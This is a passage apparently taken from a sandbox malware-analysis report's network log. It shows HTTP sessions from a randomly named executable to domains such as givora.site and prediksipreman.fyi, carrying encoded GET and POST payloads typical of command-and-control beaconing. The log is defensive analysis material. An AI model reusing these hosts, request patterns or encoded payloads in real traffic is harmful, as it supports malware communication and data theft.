F}zGp&^n%>y;E/S(6+=HbT~T p@u&[]cdtj~ S#@t.g\|D%~
Oct 31, 2024 10:26:19.271198988 CET	1236	IN	Data Raw: 9c f1 09 81 12 f8 9b 1a de f8 f9 5b e2 3a a1 35 f8 53 02 1c e9 8b 62 c6 23 32 ef fe 7c b3 cd 2d 6a 6f 86 7b e1 e5 59 79 89 50 0f 83 c2 8d 81 af 6b 6e 0c b0 9f d3 7b 2c 60 3f ed c3 20 08 1d c7 4d df 58 ea 47 fb 76 15 9f 2e c8 7e b6 eb f7 f3 de d8 Data Ascii: [:5Sb#2\|-jo{YyPkn{,`? MXGv.~Wa'~'RSyu{/!V~E}F>xazOyvIw!J=#>uB[_E?gCgc3Y\We+z`
Oct 31, 2024 10:26:19.271239042 CET	424	IN	Data Raw: 8e 0d f8 6d b8 28 71 6a 0e 4b 66 1b 2e 3a 5d f4 5d 7e 66 27 7b 59 a2 6c 5b d4 59 a7 33 5c d3 4a 27 b9 36 95 19 83 93 26 5d 8b da c1 34 64 e8 2c 89 ce 78 47 e0 31 94 d6 1b 21 d9 04 91 56 22 d6 c8 1c 9b e2 da 1d 8f b1 04 ad 76 b1 c1 f0 c1 4c a2 a2 Data Ascii: m(qjKf.:]]~f'{Yl[Y3\J'6&]4d,xG1!V"vLQZyr<.[!S!]&hclyV90{c\][\|t:" Gw;n8snh-Hgfp8VAo(rF(bR-pF-#;rRe);PhJYlLCTK(IZ
Oct 31, 2024 10:26:19.271451950 CET	1236	IN	Data Raw: 85 da 70 b7 30 ce 31 bb 90 4f 21 b5 83 e6 5b 10 6d 96 c3 f0 58 48 84 96 d6 4a ec 91 d9 9a df cf 48 7a 38 1c 69 da 0c 99 2b c5 ea 80 55 e1 c6 b3 27 69 80 04 aa 94 9b fc 5a 38 24 0c ed 62 7b 6a 68 e0 ad dc 85 59 c8 17 7a 82 a5 75 e0 90 9a ce d2 a4 Data Ascii: p01O![mXHJHz8i+U'iZ8$b{jhYzutz.]+V=?!(@`F8'!I;yw<*sgTK3HYJn}XuuF.4qO1EAsidlBFIRlNo3_dF&
Oct 31, 2024 10:26:19.271490097 CET	1105	IN	Data Raw: 88 b7 c5 5a 77 49 92 db f1 76 14 6c 75 8e d3 cf 4e 2b ee e0 21 87 05 87 03 28 fa e1 f2 7e 78 42 15 49 39 42 7b 77 07 02 a6 43 12 a3 e1 b8 55 4d 4f 21 f3 1d 63 23 3e 34 9d 85 33 33 54 0a aa 20 1a 74 57 34 ce be b2 ce 39 3a 5a 2d d9 85 b7 cb 73 39 Data Ascii: ZwIvluN+!(~xBI9B{wCUMO!c#>433T tW49:Z-s9Q>Yd)e'BvP4NBC4V`W>0.&XoyV%hF~Hl?ea0@3^-4EYs?g}j(la)D6#6@7%V+4FjBuE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49994	162.0.215.244	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:20.766700983 CET	463	OUT	GET /3lre/?1Zgl=/6Vdp+1Y21llHWrnJFgTkMelxgdakbST517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnWVF0YU8xlLcjqFiWcTqSDyUhRRfYLZXOVM1ZwNUIzk+NCQ==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.prediksipreman.fyi User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:26:21.620354891 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Thu, 31 Oct 2024 09:26:21 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 38 36 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 2786<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Oct 31, 2024 10:26:21.620404959 CET	1236	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
Oct 31, 2024 10:26:21.620440960 CET	1236	IN	Data Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
Oct 31, 2024 10:26:21.620959997 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
Oct 31, 2024 10:26:21.620995045 CET	1236	IN	Data Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34 Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
Oct 31, 2024 10:26:21.621047974 CET	1236	IN	Data Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
Oct 31, 2024 10:26:21.621824980 CET	1236	IN	Data Raw: 57 78 51 78 75 6b 6e 67 75 4a 31 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59 Data Ascii: WxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8
Oct 31, 2024 10:26:21.621871948 CET	1236	IN	Data Raw: 6f 6e 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 Data Ascii: on class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this
Oct 31, 2024 10:26:21.621906996 CET	460	IN	Data Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 Data Ascii: <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/power

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49995	162.0.231.203	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:26.710766077 CET	713	OUT	POST /855d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.givora.site Origin: http://www.givora.site Referer: http://www.givora.site/855d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 37 44 63 6b 53 47 50 49 41 30 45 67 70 64 78 67 64 64 55 6a 67 50 48 64 77 47 4c 6a 43 55 61 30 4b 6e 35 53 58 44 32 6a 34 6a 4d 61 42 6b 76 35 34 78 61 4a 62 37 53 65 39 75 73 51 6a 5a 57 36 6c 2b 67 70 61 38 33 57 37 30 53 54 78 66 38 32 35 72 49 46 37 38 55 2f 74 68 43 36 67 65 4b 7a 78 64 4c 59 77 35 47 45 37 75 45 4e 42 53 2f 42 64 53 57 52 6d 35 75 51 6e 71 47 2f 78 42 77 49 57 42 52 59 56 57 6a 46 56 42 33 43 2b 53 53 45 65 63 74 42 37 35 6b 4a 53 62 37 41 78 72 7a 65 34 51 43 39 31 52 38 39 78 35 4b 35 39 48 38 69 41 37 30 77 67 45 68 68 46 36 6e 33 58 5a 76 57 4a 4a 74 79 64 37 6b 3d Data Ascii: 1Zgl=7DckSGPIA0EgpdxgddUjgPHdwGLjCUa0Kn5SXD2j4jMaBkv54xaJb7Se9usQjZW6l+gpa83W70STxf825rIF78U/thC6geKzxdLYw5GE7uENBS/BdSWRm5uQnqG/xBwIWBRYVWjFVB3C+SSEectB75kJSb7Axrze4QC91R89x5K59H8iA70wgEhhF6n3XZvWJJtyd7k=
Oct 31, 2024 10:26:27.395555019 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:26:27 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49996	162.0.231.203	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:29.263995886 CET	733	OUT	POST /855d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.givora.site Origin: http://www.givora.site Referer: http://www.givora.site/855d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 37 44 63 6b 53 47 50 49 41 30 45 67 6f 38 42 67 66 2b 38 6a 77 66 48 65 7a 47 4c 6a 5a 45 61 6f 4b 6e 31 53 58 43 43 7a 35 56 55 61 42 41 72 35 2f 77 61 4a 59 37 53 65 31 4f 74 61 2b 4a 57 68 6c 2b 63 50 61 38 4c 57 37 30 75 54 78 62 34 32 2b 63 38 47 36 73 55 39 69 42 43 34 71 2b 4b 7a 78 64 4c 59 77 34 6d 69 37 71 51 4e 42 44 50 42 48 7a 57 53 6c 35 75 54 67 71 47 2f 6d 52 77 4d 57 42 52 66 56 54 65 51 56 43 66 43 2b 51 36 45 65 6f 35 43 78 35 6b 4c 63 37 36 74 35 4b 75 56 69 51 2b 61 2f 6e 70 34 77 5a 58 4d 38 78 4e 49 61 5a 38 59 7a 6b 4e 5a 56 70 76 41 47 70 4f 2f 54 71 39 43 44 73 78 59 5a 54 59 64 6b 30 41 47 4a 50 77 4c 76 56 63 52 4e 75 72 6c Data Ascii: 1Zgl=7DckSGPIA0Ego8Bgf+8jwfHezGLjZEaoKn1SXCCz5VUaBAr5/waJY7Se1Ota+JWhl+cPa8LW70uTxb42+c8G6sU9iBC4q+KzxdLYw4mi7qQNBDPBHzWSl5uTgqG/mRwMWBRfVTeQVCfC+Q6Eeo5Cx5kLc76t5KuViQ+a/np4wZXM8xNIaZ8YzkNZVpvAGpO/Tq9CDsxYZTYdk0AGJPwLvVcRNurl
Oct 31, 2024 10:26:29.939997911 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:26:29 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49997	162.0.231.203	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:31.804656982 CET	1750	OUT	POST /855d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.givora.site Origin: http://www.givora.site Referer: http://www.givora.site/855d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 37 44 63 6b 53 47 50 49 41 30 45 67 6f 38 42 67 66 2b 38 6a 77 66 48 65 7a 47 4c 6a 5a 45 61 6f 4b 6e 31 53 58 43 43 7a 35 56 63 61 43 7a 7a 35 2f 54 43 4a 5a 37 53 65 2f 75 74 5a 2b 4a 58 7a 6c 36 77 44 61 38 48 73 37 78 71 54 77 34 67 32 2f 75 55 47 7a 73 55 39 67 42 43 35 67 65 4c 75 78 65 7a 63 77 35 4b 69 37 71 51 4e 42 41 58 42 4a 79 57 53 6f 5a 75 51 6e 71 47 72 78 42 77 30 57 42 4a 51 56 53 72 72 56 7a 2f 43 2b 77 4b 45 4e 75 46 43 35 35 6b 46 52 62 36 31 35 4b 69 61 69 54 61 42 2f 6e 31 43 77 62 58 4d 39 47 64 51 47 61 49 76 78 6c 64 55 53 37 4c 56 52 76 4b 67 62 4b 46 51 41 4f 56 74 55 44 45 72 6d 79 73 61 41 76 34 46 30 51 4a 65 44 4c 32 70 62 65 6b 73 37 32 70 6f 34 63 59 44 6f 6b 75 61 31 57 35 6d 6e 5a 41 47 77 74 67 30 57 31 2b 6d 47 44 4d 74 69 6f 35 6d 63 38 79 4c 55 4c 72 4f 53 45 59 75 77 44 32 32 75 53 4a 64 5a 37 42 7a 42 43 44 57 71 75 47 53 57 57 55 45 42 6e 57 4b 32 48 76 67 75 77 76 6c 37 75 53 6d 65 71 4a 66 50 6a 76 33 52 72 7a 4e 7a 72 34 50 5a 41 37 6a 41 [TRUNCATED] Data Ascii: 1Zgl=7DckSGPIA0Ego8Bgf+8jwfHezGLjZEaoKn1SXCCz5VcaCzz5/TCJZ7Se/utZ+JXzl6wDa8Hs7xqTw4g2/uUGzsU9gBC5geLuxezcw5Ki7qQNBAXBJyWSoZuQnqGrxBw0WBJQVSrrVz/C+wKENuFC55kFRb615KiaiTaB/n1CwbXM9GdQGaIvxldUS7LVRvKgbKFQAOVtUDErmysaAv4F0QJeDL2pbeks72po4cYDokua1W5mnZAGwtg0W1+mGDMtio5mc8yLULrOSEYuwD22uSJdZ7BzBCDWquGSWWUEBnWK2Hvguwvl7uSmeqJfPjv3RrzNzr4PZA7jA3gRNZszQvOwckEjR20pHk/7aOEnpL90t5/68Qag6Ni5wNZsM46KJqkB+VeviEwS/q7trzC+Pf5saqX5DAr/E/+1xG2LDGdkWh5hlvn+xLIBJyiYNlvpQ2xdkNFjaMP/27tvHuICKitbiClLkqSEWY7NNTPoA+9HKU/A6+TUaNBTULeW4bNExYS6td3hOOR7gmitfC1BC0ZHO5uoRNj1lh46tv4M0Ysmj8t8DCmFIyaBDZm/mYRG06EklObWux1KkW4TnnGzX1rsk5V97CAwBMBFdWHOJczM2Bu57K2SFT0FSrr5AAz9ORJwrdqbsYIn4NnyCnxQI/7ot6VwIwQPA2I+QeKhdYU/1OSAOSDr+Do9BXpL6y8IiZCL4B5jCQV1pjYijGDpCtaXKo1eoKxD/KUq8dYQw9/GeGVK5i1z37H1B7GtewqncHRlBRpvMfRjSnCepDr0MgXd/EjusPOPMEVmN19HnAbUKnCQKWtWEP822m4nLmn60Ei9IqcHKOuorUaF7OcPvTwExm7Vw7exG3V7RSppg6LrLsmhwj0wYyL7G6100KJCxUUsPKn/bB3JVBG+j7re450otdTUoRebiWDeWYfJbJ5kZP2kCBmEl/HUtfPl3316Qo/85ivFmUlmpz69irZD7RWDwFmQA8zPgJ07sNpb8VVr8Wn [TRUNCATED]
Oct 31, 2024 10:26:32.466545105 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:26:32 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49998	162.0.231.203	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:34.344094038 CET	456	OUT	GET /855d/?1Zgl=2B0ERzH0P28lwthSCfczi4+l4RSaGiycEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoS8eZDgAyht6z65PzZnN779aUYRwuiIRWQuovW44/rxTRHXQ==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.givora.site User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:26:35.020091057 CET	548	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:26:34 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 